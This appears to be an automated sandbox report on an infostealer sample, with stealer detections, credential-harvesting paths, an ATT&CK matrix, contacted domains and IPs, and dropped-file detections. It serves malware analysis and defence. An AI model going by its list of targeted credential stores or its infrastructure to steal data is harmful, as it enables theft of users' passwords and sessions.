                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_004223BC
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004711D2 GetUserNameW,0_2_004711D2
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0040E470
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.916.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.935.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.915.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1054.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1088.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.Native_Redline_BTC.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1083.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1089.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.svchost.exe.6200000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1085.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.936.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.976.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1090.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1053.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1107.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1087.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.svchost.exe.6200000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.975.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5d0000.1151.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.1055.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1084.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1127.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1128.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1108.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1152.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1109.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1086.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.600000.1082.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5d0000.1150.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.build.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f5b188.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f5b188.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Native_Redline_BTC.exe PID: 1900, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: build.exe PID: 1412, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                        Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Tries to harvest and steal browser information (history, passwords, etc)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                        Tries to harvest and steal ftp login credentials
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Tries to steal Mail credentials (via file / registry access)
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: AENiBH7X1q.exe, 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
                        Source: AENiBH7X1q.exeBinary or memory string: WIN_XP
                        Source: AENiBH7X1q.exeBinary or memory string: WIN_XPe
                        Source: AENiBH7X1q.exeBinary or memory string: WIN_VISTA
                        Source: AENiBH7X1q.exeBinary or memory string: WIN_7

                        Remote Access Functionality

                        barindex
                        Yara detected PureLog Stealer
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.916.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.935.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.915.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1054.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1088.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.Native_Redline_BTC.exe.ab0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1083.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1089.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.svchost.exe.6200000.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1085.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.936.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.976.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1090.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1053.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1107.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1087.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.svchost.exe.6200000.3.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.975.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5d0000.1151.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5f0000.1055.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1084.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1127.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5b0000.1128.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1108.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5a0000.1152.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5c0000.1109.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5e0000.1086.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.600000.1082.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 3.3.microsofts.exe.5d0000.1150.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000003.00000003.2390841675.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000000.2105969324.0000000000AB2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2396891377.0000000007550000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.2121412758.0000000006200000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Native_Redline_BTC.exe, type: DROPPED
                        Yara detected RedLine Stealer
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f0ff50.5.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 6.0.build.exe.de0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f5b188.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.Native_Redline_BTC.exe.12f5b188.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012F52000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012E79000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000006.00000000.2122053176.0000000000DE2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.2126254452.0000000012F07000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: Native_Redline_BTC.exe PID: 1900, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: build.exe PID: 1412, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_004741BB
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket,0_2_0046483C
                        Source: C:\Users\user\Desktop\AENiBH7X1q.exeCode function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0047AD92

                        Mitre Att&ck Matrix

                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire Infrastructure2
                        Valid Accounts                        		121
                        Windows Management Instrumentation                        		2
                        LSASS Driver                        		1
                        Exploitation for Privilege Escalation                        		111
                        Disable or Modify Tools                        		2
                        OS Credential Dumping                        		11
                        System Time Discovery                        		1
                        Taint Shared Content                        		11
                        Archive Collected Data                        		4
                        Ingress Tool Transfer                        		Exfiltration Over Other Network Medium1
                        System Shutdown/Reboot
                        CredentialsDomainsDefault Accounts21
                        Native API                        		1
                        DLL Side-Loading                        		1
                        Abuse Elevation Control Mechanism                        		11
                        Deobfuscate/Decode Files or Information                        		121
                        Input Capture                        		1
                        Account Discovery                        		Remote Desktop Protocol2
                        Data from Local System                        		11
                        Encrypted Channel                        		Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts2
                        Command and Scripting Interpreter                        		2
                        Valid Accounts                        		2
                        LSASS Driver                        		1
                        Abuse Elevation Control Mechanism                        		1
                        Credentials in Registry                        		3
                        File and Directory Discovery                        		SMB/Windows Admin Shares1
                        Email Collection                        		1
                        Non-Standard Port                        		Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal Accounts1
                        Scheduled Task/Job                        		1
                        Windows Service                        		1
                        DLL Side-Loading                        		4
                        Obfuscated Files or Information                        		NTDS138
                        System Information Discovery                        		Distributed Component Object Model121
                        Input Capture                        		4
                        Non-Application Layer Protocol                        		Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud Accounts2
                        Service Execution                        		1
                        Scheduled Task/Job                        		2
                        Valid Accounts                        		12
                        Software Packing                        		LSA Secrets1
                        Query Registry                        		SSH4
                        Clipboard Data                        		125
                        Application Layer Protocol                        		Scheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled Task2
                        Registry Run Keys / Startup Folder                        		21
                        Access Token Manipulation                        		1
                        Timestomp                        		Cached Domain Credentials431
                        Security Software Discovery                        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                        Windows Service                        		1
                        DLL Side-Loading                        		DCSync151
                        Virtualization/Sandbox Evasion                        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/Job212
                        Process Injection                        		322
                        Masquerading                        		Proc Filesystem3
                        Process Discovery                        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAt1
                        Scheduled Task/Job                        		2
                        Valid Accounts                        		/etc/passwd and /etc/shadow11
                        Application Window Discovery                        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCron2
                        Registry Run Keys / Startup Folder                        		151
                        Virtualization/Sandbox Evasion                        		Network Sniffing1
                        System Owner/User Discovery                        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd21
                        Access Token Manipulation                        		Input Capture1
                        System Network Configuration Discovery                        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task212
                        Process Injection                        		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

                        Behavior Graph

                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1549472 Sample: AENiBH7X1q.exe Startdate: 05/11/2024 Architecture: WINDOWS Score: 100 78 zyiexezl.biz 2->78 80 zlenh.biz 2->80 82 85 other IPs or domains 2->82 102 Suricata IDS alerts for network traffic 2->102 104 Found malware configuration 2->104 106 Malicious sample detected (through community Yara rule) 2->106 108 13 other signatures 2->108 11 AENiBH7X1q.exe 1 2->11         started        14 alg.exe 2->14         started        17 AppVClient.exe 2->17         started        19 20 other processes 2->19 signatures3 process4 dnsIp5 116 Writes to foreign memory regions 11->116 118 Maps a DLL or memory area into another process 11->118 120 Switches to a custom stack to bypass stack traces 11->120 122 Contains functionality to detect sleep reduction / modifications 11->122 21 svchost.exe 4 11->21         started        92 yauexmxk.biz 18.208.156.248, 59550, 59646, 59666 AMAZON-AESUS United States 14->92 94 htwqzczce.biz 172.234.222.138, 59394, 59396, 59527 AKAMAI-ASN1EU United States 14->94 96 12 other IPs or domains 14->96 124 Creates files in the system32 config directory 14->124 126 Contains functionality to behave differently if execute on a Russian/Kazak computer 14->126 128 Creates files inside the volume driver (system volume information) 19->128 130 Found direct / indirect Syscall (likely to bypass EDR) 19->130 signatures6 process7 file8 60 C:\Users\user\AppData\...\microsofts.exe, PE32 21->60 dropped 62 C:\Users\user\...62ative_Redline_BTC.exe, PE32 21->62 dropped 64 C:\Program Files (x86)\...\armsvc.exe, PE32 21->64 dropped 110 Drops executable to a common third party application directory 21->110 112 Infects executable files (exe, dll, sys, html) 21->112 25 microsofts.exe 15 2 21->25         started        30 Native_Redline_BTC.exe 6 21->30         started        signatures9 process10 dnsIp11 86 s82.gocheapweb.com 51.195.88.199, 49711, 587, 59400 OVHFR France 25->86 88 wxgzshna.biz 72.52.178.23, 61997, 61999, 62004 LIQUIDWEBUS United States 25->88 90 8 other IPs or domains 25->90 66 C:\Windows\System32\wbengine.exe, PE32+ 25->66 dropped 68 C:\Windows\System32\wbem\WmiApSrv.exe, PE32+ 25->68 dropped 70 C:\Windows\System32\vds.exe, PE32+ 25->70 dropped 76 140 other malicious files 25->76 dropped 132 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 25->132 134 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 25->134 136 Tries to steal Mail credentials (via file / registry access) 25->136 138 5 other signatures 25->138 72 C:\Users\user\AppData\...\server_BTC.exe, PE32 30->72 dropped 74 C:\Users\user\AppData\Local\Temp\build.exe, PE32 30->74 dropped 32 server_BTC.exe 30->32         started        36 build.exe 30->36         started        file12 signatures13 process14 dnsIp15 58 C:\Users\user\AppData\...\TrojanAIbot.exe, PE32 32->58 dropped 98 Uses schtasks.exe or at.exe to add and modify task schedules 32->98 100 Adds a directory exclusion to Windows Defender 32->100 39 powershell.exe 32->39         started        42 cmd.exe 32->42         started        44 schtasks.exe 32->44         started        46 TrojanAIbot.exe 32->46         started        84 212.162.149.53, 2049, 49708, 59397 UNREAL-SERVERSUS Netherlands 36->84 file16 signatures17 process18 signatures19 114 Loading BitLocker PowerShell Module 39->114 48 conhost.exe 39->48         started        50 conhost.exe 39->50         started        52 WmiPrvSE.exe 39->52         started        54 conhost.exe 42->54         started        56 timeout.exe 42->56         started        process20

                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        AENiBH7X1q.exe46%ReversingLabsWin32.Trojan.AutoitInject
                        AENiBH7X1q.exe100%AviraTR/AD.Nekark.mpdfl
                        AENiBH7X1q.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\Program Files (x86)\AutoIt3\Au3Check.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Info.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe100%AviraW32/Infector.Gen
                        C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
                        C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe100%Joe Sandbox ML
